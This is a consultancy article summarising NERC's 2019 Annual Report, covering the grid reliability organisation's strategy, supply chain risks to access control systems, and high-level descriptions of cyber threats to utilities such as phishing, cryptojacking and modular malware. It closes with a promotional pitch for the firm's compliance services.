On February 7, 2020, NERC published the 2019 Annual Report which provides a thorough overview of the work done by the Electric Reliability Organization (ERO) Enterprise and throughout the industry to assure the reliability and security of the grid in the face of a changing ecosystem.

The report is a very helpful resource for all industry-related cybersecurity experts as it provides an insight on developments affecting the operation of the electric grid in North America (US and Canada). This article provides the key outtakes of the report, focusing on supply chain risks and cybersecurity attack vectors.

The ERO Mission and Strategy

The Electric Reliability Organization (ERO) Enterprise, which consists of the North American Electric Reliability Corporation (NERC) and six Regional Entities, serves to strengthen the electric grid for the benefit of nearly 400 million North American citizens.

“Assuring a highly reliable and secure grid is NERC’s continuous mission. Electricity is essential to the quality of our 21st-century lifestyle and is delivered by a complex fabric of industry participants, government partners, and nongovernmental organizations. My objective is to ensure that the ERO Enterprise plays its part in strengthening that fabric for the benefit of all North Americans,” notes Jim Robb, President and CEO, NERC.

To support its mission, ERO released “The ERO Enterprise Strategy”, which serves as a guide to the why, how and what of the ERO mission.

  • The “why” is to assure a highly reliable and secure BPS.
  • The four major “hows” are
    • Deploying and engaging top talent and expertise,
    • Innovating our products and services and keeping risk in mind as we evolve our programs,
    • Collaborating fulsomely and effectively with industry, and
    • Maintaining our independence and objectivity.
  • The “what” is executing ERO Enterprise programs effectively, efficiently, and collaboratively to achieve greater consistency, equity, and impact with all of our program activities.

The ERO Strategic Plan focuses on five key areas:

  • Expand a risk-based focus in regulatory activities to ensure mitigation of real risks to reliability and security
  • Ensure actions are in place to mitigate known risks and better understand emerging risks to reliability and security
  • Build a strong security capability for industry centered around the Electricity Information Sharing and Analysis Center (E-ISAC)
  • Strengthen the outreach and engagement across the reliability and security ecosystem in North America to ensure the work is relevant and impactful to decision makers, whether they be utility planners, control operators, regulators, security professionals, or policymakers
  • Pursue continuous improvement in the effectiveness and efficiency of activities

The ERO Enterprise assures North American BPS reliability primarily through the identification, prioritization, and effective and efficient mitigation of risks. By maintaining a risk-based focus in its operations, the ERO Enterprise is able to apply resources to the most significant reliability risks and better respond to emerging risks.

Supply Chain Risks

The supply chains for information and communications technology as well as industrial control systems may provide various opportunities for compromise, thereby presenting risks to Bulk Electric System (BES) security.

The Supply Chain Standards (CIP-013-1, CIP-010-3, CIP-005-6) require responsible entities that possess medium- and high-impact BES cyber systems to develop processes to ensure that supply chain risks are being managed through the procurement process. Consistent with the risk-based framework of the NERC CIP Reliability Standards, the Supply Chain Standards are applicable to the highest risk systems with the greatest impact to the grid.

In May, the NERC Board of Trustees (Board) accepted NERC’s Cyber Security Supply Chain Risks report, which provided an analysis of best practices and standards in other industries to mitigate supply chain risks. In particular, the report documented the results of the evaluation of supply chain risks associated with certain categories of assets not currently subject to the Supply Chain Standards, and recommended actions to address those risks. The following paragraphs detail these categories of assets.

Electronic Access Control Monitoring Systems

More specifically, the report addressed the reliability risks associated with the supply chain for Electronic Access Control or Monitoring Systems (EACMS), which are not currently subject to the Supply Chain Standards. The components that make up EACMS are typically used to control access to, secure, and monitor critical systems on the BES, such as EMS/SCADA and microprocessor-based relays.

Although the CIP Reliability Standards currently contain protections for EACMS, these protections do not extend to risks specific to the supply chain. If compromised, misused, or rendered unavailable, EACMS components could have a real-time impact on the reliability of the BES. The risks posed by supply chain vulnerabilities depend in large part on the specific configuration of the EACMS, where the EACMS is deployed (i.e., at low, medium, or high impact BES cyber system), and the extent to which certain compensating measures are employed.

Physical Access Control Systems

Further, the Supply Chain Risks report addressed the reliability risks for Physical Access Control Systems (PACS), which are not currently subject to the Supply Chain Standards. The systems that makeup PACS are often used to control and monitor physical access to facilities and systems on the BES where BES cyber systems reside. These include physical intrusion-detection systems, log monitors, and systems to control physical access. Examples of PACS cyber asset types include authentication servers, card systems, and badge control systems.

PACS are potentially vulnerable to risks from the supply chain. If compromised, misused, or rendered unavailable, PACS components could have a real-time impact on the reliability of the BES. Compromise of the cyber systems that perform monitoring, while not presenting as high of a risk, could impact the ability to quickly analyze an attack and may mask real-time alarms for access from those that are actively assessing reliability. Compromised PACS monitoring systems may also eliminate the entity’s ability to detect illicit access to Facilities and their associated BES cyber systems.

Low Impact BES Cyber Systems

The Supply Chain Standards are applicable only to high and medium impact BES cyber systems. Low impact BES Cyber Systems are generally comprised of the same types of cyber assets as those in high and medium impact and are therefore subject to similar supply chain risks. However, individually they present a lower risk to BES reliability if they are compromised. For example, supply chain risks would include those posed by the introduction of malicious code in the supply chain and the employees of vendors who have remote access into their systems.

Although the compromise of an individual low impact BES cyber system would, by definition, not pose a risk to reliability, there may be potential negative impacts on reliability if numerous low impact systems were compromised. This could happen if a major vendor with a sizable market share unintentionally supplied a compromised product to a sizable percentage of the industry, and a malicious actor then exploited the single configuration-based vulnerability across a number of devices. Viruses, worms, and malware programs target “common mode vulnerabilities” in this manner.

There is also a second potential risk associated with low impact BES Cyber Systems, particularly those owned by an entity that also owns high or medium systems. The risk is that a malicious actor could target the supply chain for a low impact BES Cyber System and exploit that vulnerability to attack other systems owned by the same entity, including high and medium BES Cyber Systems at larger and more critical BES Facilities.

As a result of the above-mentioned analysis, the Supply Chain Risks report recommends that the Supply Chain Standards should be modified to include electronic and physical access controls for medium- and high-impact BES cyber systems, as well as low impact BES cyber systems.

State of Reliability

NERC issues an annual, independent assessment of BPS performance that informs regulators, policymakers, and industry leaders of reliability and performance trends, needed actions to address known and emerging risks, and whether mitigations have led to positive improvements on the system.

Ongoing performance measures show positive trends in the generation, transmission, and protection and control performance. However, NERC’s 2019 State of Reliability encouraged continued vigilance as the evolving resource mix and cyber and physical security threats continue to present critical challenges.

Cybersecurity issues remain a priority for NERC since cyber threats are becoming more sophisticated and increasing in number. The exploitation of cyber vulnerabilities can result in loss of control or damage to utility voice communications, data, monitoring, protection and control systems, and tools. The potential for a cyber or physical attack on natural gas infrastructure highlights the need for increased coordination to improve response and recovery times due to the interdependency of the natural gas and electricity system. Interdependency and increased reliance on third-party service providers, cloud-based services, and the supply chain expands the attack surface and associated risk for potential cyber vulnerabilities. The increasing digitization of the distribution system and internet-connected loads further expands the attack surface physically and logically, increasing risk to the BPS.

The State of Reliability report identifies three attack vectors:

  • Trusted third-party phishing emails
  • Cryptojacking and malware
  • Malware frameworks (like Shamoon or GreyEnergy)

Trusted Third-Party Phishing

One of the most common cyber attacks was phishing emails received through trusted third parties (e.g., law firms, suppliers, solution providers) where the IT networks were compromised. In fact, the Wall Street Journal reported recently that approximately 60 utilities were targeted using phishing emails from existing trusted relationships, about two dozen were breached, and the attackers reached industrial control systems in at least eight of those cases.

The phishing emails are typically sent to the third-party victim’s contact list or as a reply to the most recent conversations to increase the likelihood the recipient will believe the email came from a trusted source. Since the source is a seemingly legitimate organization, security solutions that perform anti-spoofing or spam filtering are less effective. While this type of phishing is prolific, it usually has little more sophistication than normal spam phishing

Cryptojacking and Ransomware

Financially motivated criminals shifted focus from ransomware to crypto-jacking mainly because ransomware is quick and easy to detect due to its disruptive nature. To continue to bypass automated security systems, new ransomware variants must be continually developed. Comparatively, crypto-jacking incidents typically seek to avoid detection by using only a small portion of the victim’s computer processing power to mine currency.

While most crypto-jacking infections will not make the target system unusable, infected hosts are still negatively impacted. Prolonged operations of crypto-miners can burn out components, requiring more frequent replacement, and some crypto-jacking malware ignores stealth and uses all available processing power, effectively causing a denial-of-service condition on the system.

Malware Frameworks

Each time a new malware framework is discovered, the E-ISAC works with a variety of government and private sector partners to deliver actionable and timely information to the industry. The threat, however, is clear: advanced attackers continue to develop highly modular tools with the ability to greatly impact a targeted system.

Modular malware allows attackers faster development time and the ability to avoid analyst scrutiny. Instead of having to rewrite large swaths of code every time the malware’s functionality needs to be changed or a new system is targeted, the developers are compartmentalizing malware into functional pieces that can be easily swapped out. This also allows attackers to only deliver the final payload of the malware right before it is to be executed on the target system. If an entity discovers the malware before this time, defenders are left without the context behind the attack; likewise, unused modules remain viable for future use.

While modular malware is not new, it is becoming increasingly popular across all attacker skill levels. Criminal organizations are increasingly using common malware, like Emotet and Pony Loader, to perform initial infections and then delivering the intended payload after establishing a foothold in a system. While highly specialized tools, like GreyEnergy and TRISIS, can allow advanced threat actors to impact specific systems, hiding behind common malware like Emotet can make differentiating hostile activity from standard operations more difficult.

Assessment

The State of Reliability report provides an assessment of the continuing cyber threats which include the following:

Supply Chain: The supply chains for IT and ICS may provide various opportunities for adversaries to initiate cyber-attacks. For example, recent incidents, such as those reported by WSJ, have demonstrated that nation-state adversaries are targeting the electric grid industry and other industries by compromising the networks of third parties with which the intended targets have established business relationships.

Credential Harvesting: Tactics to acquire legitimate user credentials to gain initial access to targeted networks and establish persistence mechanisms will continue to be popular because they help actors evade detection. Sophisticated spear phishing activity to harvest credentials is the most common technique observed by members.

Network Device Targeting: Switches and routes located on the edge of networks are a prime target for threat actors capable of intercepting and processing a large amount of information. Because these devices are placed at the boundary between internal networks and the internet and allow controlled access to the internal network, they will most likely continue to be a target of reconnaissance.

Use of Native Tools: Adversaries will likely continue to use tools and capabilities already present on a compromised network, such as PowerShell or Windows Management Infrastructure, to conduct reconnaissance, lateral movement, and privilege escalation. The presence or use of these tools on a targeted network is unlikely to raise alarm, so their inappropriate use helps evade detection.

Conclusion

The NERC 2019 Annual Report and the associated Supply Chain Risks and Reliability reports are excellent resources for all-electric grid facilities to provide enhanced awareness on all issues pertaining to the industry. ITEGRITI can help respective entities mitigate the cyber threats and risks referred to in these reports with programs that are supported by internal controls which can measure, monitor and report ongoing program effectiveness. Contact the experts to learn how.